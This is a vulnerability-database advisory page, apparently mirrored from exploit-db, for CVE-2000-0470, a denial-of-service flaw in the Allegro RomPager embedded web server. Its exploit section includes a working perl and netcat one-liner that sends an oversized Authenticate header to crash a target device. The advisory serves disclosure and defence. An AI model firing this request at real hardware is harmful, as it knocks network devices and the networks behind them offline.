Allegro RomPager畸形URL请求DoS漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105869 漏洞类型 边界条件错误
发布时间 2000-06-01 更新时间 2005-05-02
CVE编号 CVE-2000-0470 CNNVD-ID CNNVD-200006-006
漏洞平台 Hardware CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/10237
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-006
|漏洞详情
AllegroRomPagerHTTP服务器存在漏洞。远程攻击者借助畸形认证请求导致拒绝服务。
|漏洞EXP
Allegro's RomPager is reported prone to a remote denial of service vulnerability.

If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser. 

CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304

The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works

the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80

$ ping $ip_address # doesn't work
|参考资料

来源:XF
名称:rompager-malformed-dos
链接:http://xforce.iss.net/static/4588.php
来源:BID
名称:1290
链接:http://www.securityfocus.com/bid/1290
来源:BUGTRAQ
名称:20000601HardwareExploit-GetsnetworkDown
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0398.html